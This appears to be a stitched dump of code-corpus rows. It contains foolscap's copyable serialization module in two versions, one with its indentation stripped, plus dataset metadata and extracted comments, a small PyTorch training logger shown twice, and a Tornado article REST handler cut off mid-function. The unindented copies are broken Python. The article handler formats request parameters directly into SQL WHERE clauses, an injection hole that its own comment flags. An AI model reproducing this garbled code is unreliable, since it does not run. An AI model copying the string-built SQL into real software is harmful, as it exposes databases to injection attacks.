        prevents this from happening, but that may go away in the future]

        Some of the objects referenced by the attribute values may have
        Deferreds in them (e.g. containers which reference recursive tuples).
        Such containers are responsible for updating their own state when
        those Deferreds fire, but until that point their state is still
        subject to change. Therefore you must be careful about how much state
        inspection you perform within this method."""

    stateSchema = interface.Attribute("""I return an AttributeDictConstraint
    object which places restrictions on incoming attribute values. These
    restrictions are enforced as the tokens are received, before the state is
    passed to setCopyableState.""")
# This maps typename to an Unslicer factory
CopyableRegistry = {}
def registerRemoteCopyUnslicerFactory(typename, unslicerfactory,
                                      registry=None):
    """Tell PB that unslicerfactory can be used to handle Copyable objects
    that provide a getTypeToCopy name of 'typename'. 'unslicerfactory' must
    be a callable which takes no arguments and returns an object which
    provides IUnslicer.
    """
    assert callable(unslicerfactory)
    # in addition, it must produce a tokens.IUnslicer . This is safe to do
    # because Unslicers don't do anything significant when they are created.
    test_unslicer = unslicerfactory()
    assert tokens.IUnslicer.providedBy(test_unslicer)
    assert type(typename) is str
    # Fix: identity comparison with None (was 'registry == None')
    if registry is None:
        registry = CopyableRegistry
    assert typename not in registry
    registry[typename] = unslicerfactory
# this keeps track of everything submitted to registerRemoteCopyFactory
debug_CopyableFactories = {}
def registerRemoteCopyFactory(typename, factory, stateSchema=None,
                              cyclic=True, registry=None):
    """Tell PB that 'factory' can be used to handle Copyable objects that
    provide a getTypeToCopy name of 'typename'. 'factory' must be a callable
    which accepts a state dictionary and returns a fully-formed instance.

    'cyclic' is a boolean, which should be set to False to avoid using a
    Deferred to provide the resulting RemoteCopy instance. This is needed to
    deserialize Failures (or instances which inherit from one, like
    CopiedFailure). In exchange for this, it cannot handle reference cycles.
    """
    assert callable(factory)
    debug_CopyableFactories[typename] = (factory, stateSchema, cyclic)
    # Choose the unslicer class up front, then register a single
    # zero-argument factory for it.
    if cyclic:
        def _make_unslicer():
            return RemoteCopyUnslicer(factory, stateSchema)
    else:
        def _make_unslicer():
            return NonCyclicRemoteCopyUnslicer(factory, stateSchema)
    registerRemoteCopyUnslicerFactory(typename, _make_unslicer, registry)
# this keeps track of everything submitted to registerRemoteCopy, which may
# be useful when you're wondering what's been auto-registered by the
# RemoteCopy metaclass magic
debug_RemoteCopyClasses = {}
def registerRemoteCopy(typename, remote_copy_class, registry=None):
    """Tell PB that remote_copy_class is the appropriate RemoteCopy class to
    use when deserializing a Copyable sequence that is tagged with
    'typename'. 'remote_copy_class' should be a RemoteCopy subclass or
    implement the same interface, which means its constructor takes no
    arguments and it has a setCopyableState(state) method to actually set the
    instance's state after initialization. It must also have a nonCyclic
    attribute.
    """
    assert IRemoteCopy.implementedBy(remote_copy_class)
    assert type(typename) is str
    debug_RemoteCopyClasses[typename] = remote_copy_class

    def _build_from_state(state):
        # no-argument construction, then install the received state
        instance = remote_copy_class()
        instance.setCopyableState(state)
        return instance

    registerRemoteCopyFactory(typename, _build_from_state,
                              remote_copy_class.stateSchema,
                              not remote_copy_class.nonCyclic,
                              registry)
class RemoteCopyClass(type):
    """Metaclass that auto-registers RemoteCopy subclasses by 'copytype'."""

    def __init__(cls, name, bases, namespace):
        type.__init__(cls, name, bases, namespace)
        # don't try to register RemoteCopy itself
        if name == "RemoteCopy" and _RemoteCopyBase in bases:
            return
        if "copytype" not in namespace:
            # TODO: provide a file/line-number for the class
            raise RuntimeError("RemoteCopy subclass %s must specify 'copytype'"
                               % name)
        copytype = namespace["copytype"]
        if copytype:
            # a falsy copytype disables auto-registration
            registerRemoteCopy(copytype, cls,
                               namespace.get("copyableRegistry", None))
@implementer(IRemoteCopy)
class _RemoteCopyBase:
    # Shared implementation for RemoteCopy and RemoteCopyOldStyle.

    stateSchema = None # always a class attribute
    nonCyclic = False

    def __init__(self):
        # the constructor will always be called without arguments
        pass

    def setCopyableState(self, state):
        # adopt the received attribute dictionary wholesale
        self.__dict__ = state
class RemoteCopyOldStyle(_RemoteCopyBase):
    # note that these will not auto-register for you, because old-style
    # classes do not do metaclass magic
    # copytype stays None here: callers must invoke registerRemoteCopy manually
    copytype = None
@six.add_metaclass(RemoteCopyClass)
class RemoteCopy(_RemoteCopyBase, object):
    """Receiver-side counterpart of a Copyable, auto-registered via metaclass."""
    # Set 'copytype' to a unique string that is shared between the
    # sender-side Copyable and the receiver-side RemoteCopy. This RemoteCopy
    # subclass will be auto-registered using the 'copytype' name. Set
    # copytype to None to disable auto-registration.
    pass
class AttributeDictConstraint(OpenerConstraint):
    """This is a constraint for dictionaries that are used for attributes.
    All keys are short strings, and each value has a separate constraint.
    It could be used to describe instance state, but could also be used
    to constrain arbitrary dictionaries with string keys.

    Some special constraints are legal here: Optional.
    """
    opentypes = [("attrdict",)]
    name = "AttributeDictConstraint"

    def __init__(self, *attrTuples, **kwargs):
        self.ignoreUnknown = kwargs.get('ignoreUnknown', False)
        self.acceptUnknown = kwargs.get('acceptUnknown', False)
        self.keys = {}
        for name, constraint in (list(attrTuples) +
                                 list(kwargs.get('attributes', {}).items())):
            # Fix: direct membership test (was 'not in list(self.keys.keys())')
            assert name not in self.keys
            self.keys[name] = IConstraint(constraint)

    def getAttrConstraint(self, attrname):
        """Return (accept, constraint) for the named attribute.

        Unknown attributes are dropped (ignoreUnknown), accepted
        unconstrained (acceptUnknown), or rejected with a Violation.
        """
        c = self.keys.get(attrname)
        if c:
            if isinstance(c, Optional):
                c = c.constraint
            return (True, c)
        # unknown attribute
        if self.ignoreUnknown:
            return (False, None)
        if self.acceptUnknown:
            return (True, None)
        raise Violation("unknown attribute '%s'" % attrname)

    def checkObject(self, obj, inbound):
        """Validate a complete dict against the per-key constraints."""
        # Fix: isinstance (was 'type(obj) != type({})', which also rejected
        # dict subclasses); isinstance accepts them, a compatible widening.
        if not isinstance(obj, dict):
            raise Violation("'%s' (%s) is not a Dictionary" % (obj,
                                                               type(obj)))
        allkeys = list(self.keys.keys())
        for k in list(obj.keys()):
            try:
                constraint = self.keys[k]
                allkeys.remove(k)
            except KeyError:
                if not self.ignoreUnknown:
                    raise Violation("key '%s' not in schema" % k)
                else:
                    # hmm. kind of a soft violation. allow it for now.
                    pass
            else:
                constraint.checkObject(obj[k], inbound)
        # Missing Optional keys are fine; anything else is a Violation.
        for k in allkeys[:]:
            if isinstance(self.keys[k], Optional):
                allkeys.remove(k)
        if allkeys:
            raise Violation("object is missing required keys: %s" %
                            ",".join(allkeys))
|
# -*- test-case-name: foolscap.test.test_copyable -*-
# this module is responsible for all copy-by-value objects
import six
from zope.interface import interface, implementer
from twisted.python import reflect, log
from twisted.python.components import registerAdapter
from twisted.internet import defer
from . import slicer, tokens
from .tokens import BananaError, Violation
from foolscap.constraint import OpenerConstraint, IConstraint, Optional
Interface = interface.Interface
############################################################
# the first half of this file is sending/serialization
class ICopyable(Interface):
"""I represent an object which is passed-by-value across PB connections.
"""
def getTypeToCopy():
"""Return a string which names the class. This string must match the
one that gets registered at the receiving end. This is typically a
URL of some sort, in a namespace which you control."""
def getStateToCopy():
"""Return a state dictionary (with plain-string keys) which will be
serialized and sent to the remote end. This state object will be
given to the receiving object's setCopyableState method."""
@implementer(ICopyable)
class Copyable(object):
# you *must* set 'typeToCopy'
def getTypeToCopy(self):
try:
copytype = self.typeToCopy
except AttributeError:
raise RuntimeError("Copyable subclasses must specify 'typeToCopy'")
return copytype
def getStateToCopy(self):
return self.__dict__
class CopyableSlicer(slicer.BaseSlicer):
"""I handle ICopyable objects (things which are copied by value)."""
def slice(self, streamable, banana):
self.streamable = streamable
yield b'copyable'
copytype = self.obj.getTypeToCopy()
assert isinstance(copytype, str)
yield six.ensure_binary(copytype)
state = self.obj.getStateToCopy()
for k,v in state.items():
yield six.ensure_binary(k)
yield v
def describe(self):
return "<%s>" % self.obj.getTypeToCopy()
registerAdapter(CopyableSlicer, ICopyable, tokens.ISlicer)
class Copyable2(slicer.BaseSlicer):
# I am my own Slicer. This has more methods than you'd usually want in a
# base class, but if you can't register an Adapter for a whole class
# hierarchy then you may have to use it.
def getTypeToCopy(self):
return reflect.qual(self.__class__)
def getStateToCopy(self):
return self.__dict__
def slice(self, streamable, banana):
self.streamable = streamable
yield b'instance'
yield six.ensure_binary(self.getTypeToCopy())
yield self.getStateToCopy()
def describe(self):
return "<%s>" % self.getTypeToCopy()
#registerRemoteCopy(typename, factory)
#registerUnslicer(typename, factory)
def registerCopier(klass, copier):
"""This is a shortcut for arranging to serialize third-party clases.
'copier' must be a callable which accepts an instance of the class you
want to serialize, and returns a tuple of (typename, state_dictionary).
If it returns a typename of None, the original class's fully-qualified
classname is used.
"""
klassname = reflect.qual(klass)
@implementer(ICopyable)
class _CopierAdapter:
def __init__(self, original):
self.nameToCopy, self.state = copier(original)
if self.nameToCopy is None:
self.nameToCopy = klassname
def getTypeToCopy(self):
return self.nameToCopy
def getStateToCopy(self):
return self.state
registerAdapter(_CopierAdapter, klass, ICopyable)
############################################################
# beyond here is the receiving/deserialization side
class RemoteCopyUnslicer(slicer.BaseUnslicer):
    """Rebuild a Copyable that was sent by value.

    Collects alternating attribute-name/value tokens into ``self.d``, then
    calls ``factory(self.d)`` when the sequence closes. ``stateSchema`` (if
    provided) constrains each incoming attribute value as it arrives.
    """
    attrname = None
    attrConstraint = None

    def __init__(self, factory, stateSchema):
        self.factory = factory
        self.schema = stateSchema

    def start(self, count):
        self.d = {}
        self.count = count
        # Register a Deferred up front so reference cycles back to this
        # object (e.g. 'obj.foo = obj') can be resolved once it exists.
        self.deferred = defer.Deferred()
        self.protocol.setObject(count, self.deferred)

    def checkToken(self, typebyte, size):
        if self.attrname is None:
            # The next token is an attribute *name*: must be a string token.
            if typebyte not in (tokens.STRING, tokens.VOCAB):
                raise BananaError("RemoteCopyUnslicer keys must be STRINGs")
        else:
            if self.attrConstraint:
                self.attrConstraint.checkToken(typebyte, size)

    def doOpen(self, opentype):
        if self.attrConstraint:
            self.attrConstraint.checkOpentype(opentype)
        unslicer = self.open(opentype)
        if unslicer:
            if self.attrConstraint:
                unslicer.setConstraint(self.attrConstraint)
        return unslicer

    def receiveChild(self, obj, ready_deferred=None):
        assert not isinstance(obj, defer.Deferred)
        assert ready_deferred is None
        if self.attrname is None:
            # This child is an attribute name.
            attrname = six.ensure_str(obj)
            if attrname in self.d:
                raise BananaError("duplicate attribute name '%s'" % attrname)
            s = self.schema
            if s:
                accept, self.attrConstraint = s.getAttrConstraint(attrname)
                assert accept
            self.attrname = attrname
        else:
            # This child is the value for the pending attribute name.
            if isinstance(obj, defer.Deferred):
                # TODO: this is an artificial restriction, and it might
                # be possible to remove it, but I need to think through
                # it carefully first
                raise BananaError("unreferenceable object in attribute")
            self.setAttribute(self.attrname, obj)
            self.attrname = None
            self.attrConstraint = None

    def setAttribute(self, name, value):
        self.d[name] = value

    def receiveClose(self):
        try:
            obj = self.factory(self.d)
        except:
            # Log which factory failed, then re-raise unchanged.
            log.msg("%s.receiveClose: problem in factory %s" %
                    (self.__class__.__name__, self.factory))
            log.err()
            raise
        self.protocol.setObject(self.count, obj)
        self.deferred.callback(obj)
        return obj, None

    def describe(self):
        # BUG FIX: this class never assigns 'classname', so the original
        # direct 'self.classname' access raised AttributeError. Use getattr
        # with a None default so a missing attribute yields "<??>".
        classname = getattr(self, "classname", None)
        if classname is None:
            return "<??>"
        me = "<%s>" % classname
        if self.attrname is None:
            return "%s.attrname??" % me
        else:
            return "%s.%s" % (me, self.attrname)
class NonCyclicRemoteCopyUnslicer(RemoteCopyUnslicer):
# The Deferred used in RemoteCopyUnslicer (used in case the RemoteCopy
# is participating in a reference cycle, say 'obj.foo = obj') makes it
# unsuitable for holding Failures (which cannot be passed through
# Deferred.callback). Use this class for Failures. It cannot handle
# reference cycles (they will cause a KeyError when the reference is
# followed).
def start(self, count):
self.d = {}
self.count = count
self.gettingAttrname = True
def receiveClose(self):
obj = self.factory(self.d)
return obj, None
class IRemoteCopy(Interface):
"""This interface defines what a RemoteCopy class must do. RemoteCopy
subclasses are used as factories to create objects that correspond to
Copyables sent over the wire.
Note that the constructor of an IRemoteCopy class will be called without
any arguments.
"""
def setCopyableState(statedict):
"""I accept an attribute dictionary name/value pairs and use it to
set my internal state.
Some of the values may be Deferreds, which are placeholders for the
as-yet-unreferenceable object which will eventually go there. If you
receive a Deferred, you are responsible for adding a callback to
update the attribute when it fires. [note:
RemoteCopyUnslicer.receiveChild currently has a restriction which
prevents this from happening, but that may go away in the future]
Some of the objects referenced by the attribute values may have
Deferreds in them (e.g. containers which reference recursive tuples).
Such containers are responsible for updating their own state when
those Deferreds fire, but until that point their state is still
subject to change. Therefore you must be careful about how much state
inspection you perform within this method."""
stateSchema = interface.Attribute("""I return an AttributeDictConstraint
object which places restrictions on incoming attribute values. These
restrictions are enforced as the tokens are received, before the state is
passed to setCopyableState.""")
# This maps typename to an Unslicer factory
CopyableRegistry = {}
def registerRemoteCopyUnslicerFactory(typename, unslicerfactory,
                                      registry=None):
    """Tell PB that unslicerfactory can be used to handle Copyable objects
    that provide a getTypeToCopy name of 'typename'. 'unslicerfactory' must
    be a callable which takes no arguments and returns an object which
    provides IUnslicer.
    """
    assert callable(unslicerfactory)
    # in addition, it must produce a tokens.IUnslicer . This is safe to do
    # because Unslicers don't do anything significant when they are created.
    test_unslicer = unslicerfactory()
    assert tokens.IUnslicer.providedBy(test_unslicer)
    assert type(typename) is str
    # Fix: identity comparison with None (was 'registry == None')
    if registry is None:
        registry = CopyableRegistry
    assert typename not in registry
    registry[typename] = unslicerfactory
# this keeps track of everything submitted to registerRemoteCopyFactory
debug_CopyableFactories = {}
def registerRemoteCopyFactory(typename, factory, stateSchema=None,
cyclic=True, registry=None):
"""Tell PB that 'factory' can be used to handle Copyable objects that
provide a getTypeToCopy name of 'typename'. 'factory' must be a callable
which accepts a state dictionary and returns a fully-formed instance.
'cyclic' is a boolean, which should be set to False to avoid using a
Deferred to provide the resulting RemoteCopy instance. This is needed to
deserialize Failures (or instances which inherit from one, like
CopiedFailure). In exchange for this, it cannot handle reference cycles.
"""
assert callable(factory)
debug_CopyableFactories[typename] = (factory, stateSchema, cyclic)
if cyclic:
def _RemoteCopyUnslicerFactory():
return RemoteCopyUnslicer(factory, stateSchema)
registerRemoteCopyUnslicerFactory(typename,
_RemoteCopyUnslicerFactory,
registry)
else:
def _RemoteCopyUnslicerFactoryNonCyclic():
return NonCyclicRemoteCopyUnslicer(factory, stateSchema)
registerRemoteCopyUnslicerFactory(typename,
_RemoteCopyUnslicerFactoryNonCyclic,
registry)
# this keeps track of everything submitted to registerRemoteCopy, which may
# be useful when you're wondering what's been auto-registered by the
# RemoteCopy metaclass magic
debug_RemoteCopyClasses = {}
def registerRemoteCopy(typename, remote_copy_class, registry=None):
"""Tell PB that remote_copy_class is the appropriate RemoteCopy class to
use when deserializing a Copyable sequence that is tagged with
'typename'. 'remote_copy_class' should be a RemoteCopy subclass or
implement the same interface, which means its constructor takes no
arguments and it has a setCopyableState(state) method to actually set the
instance's state after initialization. It must also have a nonCyclic
attribute.
"""
assert IRemoteCopy.implementedBy(remote_copy_class)
assert type(typename) is str
debug_RemoteCopyClasses[typename] = remote_copy_class
def _RemoteCopyFactory(state):
obj = remote_copy_class()
obj.setCopyableState(state)
return obj
registerRemoteCopyFactory(typename, _RemoteCopyFactory,
remote_copy_class.stateSchema,
not remote_copy_class.nonCyclic,
registry)
class RemoteCopyClass(type):
    """Metaclass that auto-registers RemoteCopy subclasses at class-creation
    time, using the subclass's 'copytype' string. Setting copytype to a
    falsy value disables auto-registration; omitting it entirely is an
    error.
    """
    # auto-register RemoteCopy classes
    def __init__(self, name, bases, dict):
        type.__init__(self, name, bases, dict)
        # don't try to register RemoteCopy itself
        if name == "RemoteCopy" and _RemoteCopyBase in bases:
            #print "not auto-registering %s %s" % (name, bases)
            return
        if "copytype" not in dict:
            # TODO: provide a file/line-number for the class
            raise RuntimeError("RemoteCopy subclass %s must specify 'copytype'"
                               % name)
        copytype = dict['copytype']
        if copytype:
            # a per-class 'copyableRegistry' attribute overrides the
            # global registry (None means use the default)
            registry = dict.get('copyableRegistry', None)
            registerRemoteCopy(copytype, self, registry)
@implementer(IRemoteCopy)
class _RemoteCopyBase:
    """Shared implementation behind RemoteCopy and RemoteCopyOldStyle."""
    stateSchema = None  # always a class attribute; constrains incoming state
    nonCyclic = False  # True means reference cycles are not supported
    def __init__(self):
        """Always constructed with no arguments; state arrives later via
        setCopyableState."""
    def setCopyableState(self, state):
        # adopt the received attribute dictionary wholesale as instance state
        self.__dict__ = state
class RemoteCopyOldStyle(_RemoteCopyBase):
    """Old-style-class variant of RemoteCopy."""
    # note that these will not auto-register for you, because old-style
    # classes do not do metaclass magic
    copytype = None  # subclasses must set this and register manually
@six.add_metaclass(RemoteCopyClass)
class RemoteCopy(_RemoteCopyBase, object):
    """New-style base class for objects received by value; subclasses are
    auto-registered by the RemoteCopyClass metaclass."""
    # Set 'copytype' to a unique string that is shared between the
    # sender-side Copyable and the receiver-side RemoteCopy. This RemoteCopy
    # subclass will be auto-registered using the 'copytype' name. Set
    # copytype to None to disable auto-registration.
    pass
class AttributeDictConstraint(OpenerConstraint):
    """This is a constraint for dictionaries that are used for attributes.
    All keys are short strings, and each value has a separate constraint.
    It could be used to describe instance state, but could also be used
    to constraint arbitrary dictionaries with string keys.
    Some special constraints are legal here: Optional.
    """
    opentypes = [("attrdict",)]
    name = "AttributeDictConstraint"
    def __init__(self, *attrTuples, **kwargs):
        """Accept attributes as positional (name, constraint) tuples and/or
        an 'attributes' keyword dict; duplicate names are rejected.
        ignoreUnknown silently drops unlisted attributes; acceptUnknown
        accepts them without constraint checking."""
        self.ignoreUnknown = kwargs.get('ignoreUnknown', False)
        self.acceptUnknown = kwargs.get('acceptUnknown', False)
        self.keys = {}
        for name, constraint in (list(attrTuples) +
                                 list(kwargs.get('attributes', {}).items())):
            assert name not in list(self.keys.keys())
            self.keys[name] = IConstraint(constraint)
    def getAttrConstraint(self, attrname):
        """Return an (accept, constraint) pair for the named attribute.
        Optional wrappers are unwrapped; unknown attributes yield
        (False, None) under ignoreUnknown, (True, None) under
        acceptUnknown, and raise Violation otherwise."""
        c = self.keys.get(attrname)
        if c:
            if isinstance(c, Optional):
                c = c.constraint
            return (True, c)
        # unknown attribute
        if self.ignoreUnknown:
            return (False, None)
        if self.acceptUnknown:
            return (True, None)
        raise Violation("unknown attribute '%s'" % attrname)
    def checkObject(self, obj, inbound):
        """Validate a complete dict against the schema: every present key's
        value is checked, and non-Optional keys must be present.
        NOTE(review): unlike getAttrConstraint, this path consults only
        ignoreUnknown (not acceptUnknown) for unknown keys -- confirm
        whether that asymmetry is intended."""
        if type(obj) != type({}):
            raise Violation("'%s' (%s) is not a Dictionary" % (obj,
                                                               type(obj)))
        allkeys = list(self.keys.keys())
        for k in list(obj.keys()):
            try:
                constraint = self.keys[k]
                allkeys.remove(k)
            except KeyError:
                if not self.ignoreUnknown:
                    raise Violation("key '%s' not in schema" % k)
                else:
                    # hmm. kind of a soft violation. allow it for now.
                    pass
            else:
                constraint.checkObject(obj[k], inbound)
        # Optional attributes may legitimately be absent; anything left
        # after removing them is a missing required key.
        for k in allkeys[:]:
            if isinstance(self.keys[k], Optional):
                allkeys.remove(k)
        if allkeys:
            raise Violation("object is missing required keys: %s" % \
                            ",".join(allkeys))
|
en
| 0.87542
|
# -*- test-case-name: foolscap.test.test_copyable -*- # this module is responsible for all copy-by-value objects ############################################################ # the first half of this file is sending/serialization I represent an object which is passed-by-value across PB connections. Return a string which names the class. This string must match the one that gets registered at the receiving end. This is typically a URL of some sort, in a namespace which you control. Return a state dictionary (with plain-string keys) which will be serialized and sent to the remote end. This state object will be given to the receiving object's setCopyableState method. # you *must* set 'typeToCopy' I handle ICopyable objects (things which are copied by value). # I am my own Slicer. This has more methods than you'd usually want in a # base class, but if you can't register an Adapter for a whole class # hierarchy then you may have to use it. #registerRemoteCopy(typename, factory) #registerUnslicer(typename, factory) This is a shortcut for arranging to serialize third-party clases. 'copier' must be a callable which accepts an instance of the class you want to serialize, and returns a tuple of (typename, state_dictionary). If it returns a typename of None, the original class's fully-qualified classname is used. ############################################################ # beyond here is the receiving/deserialization side # TODO: this is an artificial restriction, and it might # be possible to remove it, but I need to think through # it carefully first # The Deferred used in RemoteCopyUnslicer (used in case the RemoteCopy # is participating in a reference cycle, say 'obj.foo = obj') makes it # unsuitable for holding Failures (which cannot be passed through # Deferred.callback). Use this class for Failures. It cannot handle # reference cycles (they will cause a KeyError when the reference is # followed). This interface defines what a RemoteCopy class must do. 
RemoteCopy subclasses are used as factories to create objects that correspond to Copyables sent over the wire. Note that the constructor of an IRemoteCopy class will be called without any arguments. I accept an attribute dictionary name/value pairs and use it to set my internal state. Some of the values may be Deferreds, which are placeholders for the as-yet-unreferenceable object which will eventually go there. If you receive a Deferred, you are responsible for adding a callback to update the attribute when it fires. [note: RemoteCopyUnslicer.receiveChild currently has a restriction which prevents this from happening, but that may go away in the future] Some of the objects referenced by the attribute values may have Deferreds in them (e.g. containers which reference recursive tuples). Such containers are responsible for updating their own state when those Deferreds fire, but until that point their state is still subject to change. Therefore you must be careful about how much state inspection you perform within this method. I return an AttributeDictConstraint object which places restrictions on incoming attribute values. These restrictions are enforced as the tokens are received, before the state is passed to setCopyableState. # This maps typename to an Unslicer factory Tell PB that unslicerfactory can be used to handle Copyable objects that provide a getTypeToCopy name of 'typename'. 'unslicerfactory' must be a callable which takes no arguments and returns an object which provides IUnslicer. # in addition, it must produce a tokens.IUnslicer . This is safe to do # because Unslicers don't do anything significant when they are created. # this keeps track of everything submitted to registerRemoteCopyFactory Tell PB that 'factory' can be used to handle Copyable objects that provide a getTypeToCopy name of 'typename'. 'factory' must be a callable which accepts a state dictionary and returns a fully-formed instance. 
'cyclic' is a boolean, which should be set to False to avoid using a Deferred to provide the resulting RemoteCopy instance. This is needed to deserialize Failures (or instances which inherit from one, like CopiedFailure). In exchange for this, it cannot handle reference cycles. # this keeps track of everything submitted to registerRemoteCopy, which may # be useful when you're wondering what's been auto-registered by the # RemoteCopy metaclass magic Tell PB that remote_copy_class is the appropriate RemoteCopy class to use when deserializing a Copyable sequence that is tagged with 'typename'. 'remote_copy_class' should be a RemoteCopy subclass or implement the same interface, which means its constructor takes no arguments and it has a setCopyableState(state) method to actually set the instance's state after initialization. It must also have a nonCyclic attribute. # auto-register RemoteCopy classes # don't try to register RemoteCopy itself #print "not auto-registering %s %s" % (name, bases) # TODO: provide a file/line-number for the class # always a class attribute # the constructor will always be called without arguments # note that these will not auto-register for you, because old-style # classes do not do metaclass magic # Set 'copytype' to a unique string that is shared between the # sender-side Copyable and the receiver-side RemoteCopy. This RemoteCopy # subclass will be auto-registered using the 'copytype' name. Set # copytype to None to disable auto-registration. This is a constraint for dictionaries that are used for attributes. All keys are short strings, and each value has a separate constraint. It could be used to describe instance state, but could also be used to constraint arbitrary dictionaries with string keys. Some special constraints are legal here: Optional. # unknown attribute # hmm. kind of a soft violation. allow it for now.
| 1.944322
| 2
|
divmachines/logging.py
|
DanielMorales9/FactorizationPyTorch
| 4
|
6627625
|
<filename>divmachines/logging.py
class Logger(object):
    """
    Base class for loggers. Subclasses override ``log`` to record events
    and ``flush`` to discard them; the base implementations are no-ops.
    """
    def __init__(self):
        pass
    def log(self, *args, **kwargs):
        """Record a single event. No-op in the base class."""
        pass
    def flush(self):
        """
        Cancels all logs. No-op in the base class.
        """
        pass
class TrainingLogger(Logger):
    """
    Training Logger a class that logs the training process.
    It can be configured for storing the losses for each epoch
    and for each batch.
    Parameters
    ----------
    batch: bool, optional
        Flag for logging batch or not. When True, each record also stores
        the batch index and ``log`` requires its ``batch`` argument.
    """
    def __init__(self, batch=False):
        super(TrainingLogger, self).__init__()
        self._batch = batch
        self._logs = []
        # Lazily-built caches for the three properties below.
        # NOTE(review): the caches are never invalidated by log(), so
        # accessing a property before logging finishes freezes its value --
        # same behavior as before, just now documented.
        self._losses = None
        self._epochs = None
        self._batches = None
    @property
    def losses(self):
        """
        Getter for the losses (cached after first access)
        :return: list
            losses
        """
        if self._losses is None:
            if self._batch:
                self._losses = [a for a, _, _ in self._logs]
            else:
                self._losses = [a for a, _ in self._logs]
        return self._losses
    @property
    def epochs(self):
        """
        Getter for the epochs (cached after first access)
        :return: list
            epochs
        """
        if self._epochs is None:
            if self._batch:
                self._epochs = [b for _, b, _ in self._logs]
            else:
                self._epochs = [b for _, b in self._logs]
        return self._epochs
    @property
    def batches(self):
        """
        Getter for the Batches (cached after first access)
        If batch logging is not enabled raise ValueError
        :return: list
            batches
        """
        if not self._batch:
            raise ValueError("Batch logging is disabled")
        # BUGFIX: the original tested `self._batch is not None`, which is
        # always true for a bool, so the list was rebuilt on every access;
        # test the cache itself, mirroring `losses` and `epochs`.
        if self._batches is None:
            self._batches = [c for _, _, c in self._logs]
        return self._batches
    def log(self, loss, epoch, batch=None, cpu=False):
        """
        Logging function
        :param loss: tensor
            Loss value (1-element tensor) for an epoch and/or batch
        :param epoch: int
            Iteration
        :param batch: int, optional
            Batch in the Iteration (required when batch logging is enabled)
        :param cpu: bool, optional
            Move the tensor to cpu before extracting the scalar
        """
        if cpu:
            loss = loss.data.cpu().numpy()[0]
        else:
            loss = loss.data.numpy()[0]
        if self._batch:
            if batch is None:
                raise ValueError("Batch logging enabled without "
                                 "providing batch value")
            self._logs.append((loss, epoch, batch))
        else:
            self._logs.append((loss, epoch))
    def flush(self):
        """Discard every record logged so far."""
        self._logs = []
|
<filename>divmachines/logging.py
class Logger(object):
"""
Base class for logging.
"""
def __init__(self):
pass
def log(self, *args, **kwargs):
pass
def flush(self):
"""
Cancels all logs
"""
pass
class TrainingLogger(Logger):
"""
Training Logger a class that logs the training process.
It can be configured for storing the losses for each epoch
and for each batch.
Parameters
----------
batch: bool, optional
Flag for logging batch or not
"""
def __init__(self, batch=False):
super(TrainingLogger, self).__init__()
self._batch = batch
self._logs = []
self._losses = None
self._epochs = None
self._batches = None
@property
def losses(self):
"""
Getter for the losses
:return: list
losses
"""
if self._losses is None:
if self._batch:
self._losses = [a for a, _, _ in self._logs]
else:
self._losses = [a for a, _ in self._logs]
return self._losses
@property
def epochs(self):
"""
Getter for the epochs
:return: list
epochs
"""
if self._epochs is None:
if self._batch:
self._epochs = [b for _, b, _ in self._logs]
else:
self._epochs = [b for _, b in self._logs]
return self._epochs
@property
def batches(self):
"""
Getter for the Batches
If batch logging is not enable raise ValueError
:return: list
batches
"""
if not self._batch:
raise ValueError("Batch logging is disabled")
if self._batch is not None:
self._batches = [c for _, _, c in self._logs]
return self._batches
def log(self, loss, epoch, batch=None, cpu=False):
"""
Logging function
:param loss: float
Loss value for an epoch and/or batch
:param epoch: int
Iteration
:param batch: int, optional
Batch in the Iteration
:param cpu: bool, optional
Send to cpu
"""
if cpu:
loss = loss.data.cpu().numpy()[0]
else:
loss = loss.data.numpy()[0]
if self._batch:
if batch is None:
raise ValueError("Batch logging enabled without "
"providing batch value")
else:
self._logs.append((loss, epoch, batch))
else:
self._logs.append((loss, epoch))
def flush(self):
self._logs = []
|
en
| 0.700204
|
Base class for logging. Cancels all logs Training Logger a class that logs the training process. It can be configured for storing the losses for each epoch and for each batch. Parameters ---------- batch: bool, optional Flag for logging batch or not Getter for the losses :return: list losses Getter for the epochs :return: list epochs Getter for the Batches If batch logging is not enable raise ValueError :return: list batches Logging function :param loss: float Loss value for an epoch and/or batch :param epoch: int Iteration :param batch: int, optional Batch in the Iteration :param cpu: bool, optional Send to cpu
| 3.197384
| 3
|
uaa-python/app/web/rest/article_api.py
|
suomitek/cubeai
| 0
|
6627626
|
import json
import tornado.web
from app.domain.article import Article
from app.service import token_service
from app.database import article_db
from app.utils import mytime
class ArticleApiA(tornado.web.RequestHandler):
    """Collection-level REST API for articles: create (POST), update (PUT)
    and query (GET)."""
    async def post(self, *args, **kwargs):
        """Create an article from the JSON request body.
        Requires ROLE_CONTENT; responds 201 on success, 403 otherwise."""
        token = token_service.get_token(self.request)
        has_role = token.has_role('ROLE_CONTENT')
        if not has_role:
            self.send_error(403)
            return
        article = Article()
        article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
        article.complete_attrs()
        article.createdDate = mytime.now()
        article.modifiedDate = mytime.now()
        await article_db.create_article(article)
        self.set_status(201)
        self.finish()
    async def put(self, *args, **kwargs):
        """Update an article from the JSON request body.
        Requires ROLE_CONTENT; responds 201 on success, 403 otherwise."""
        token = token_service.get_token(self.request)
        has_role = token.has_role('ROLE_CONTENT')
        if not has_role:
            self.send_error(403)
            return
        article = Article()
        article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
        article.modifiedDate = mytime.now()
        await article_db.update_article(article)
        self.set_status(201)
        self.finish()
    async def get(self, *args, **kwargs):
        """Query articles by uuid, by exact-match fields, and/or by a
        free-text 'filter' matched across several columns; results are
        paginated via page/size/sort query arguments."""
        uuid = self.get_argument('uuid', None)
        authorLogin = self.get_argument('authorLogin', None)
        subject1 = self.get_argument('subject1', None)
        subject2 = self.get_argument('subject2', None)
        subject3 = self.get_argument('subject3', None)
        title = self.get_argument('title', None)
        tag1 = self.get_argument('tag1', None)
        tag2 = self.get_argument('tag2', None)
        tag3 = self.get_argument('tag3', None)
        filter = self.get_argument('filter', None)
        pageable = {
            'page': self.get_argument('page', None),
            'size': self.get_argument('size', None),
            'sort': self.get_arguments('sort'),
        }
        # uuid lookup short-circuits every other filter
        if uuid is not None:
            result = await article_db.get_articles_by_uuid(uuid)
            self.write(json.dumps(result))
            return
        # NOTE(security): request values are interpolated directly into the
        # SQL WHERE text below -- this is vulnerable to SQL injection and
        # should be migrated to parameterized queries in article_db.
        where1 = ''
        if authorLogin is not None:
            where1 += 'and author_login = "{}" '.format(authorLogin)
        if subject1 is not None:
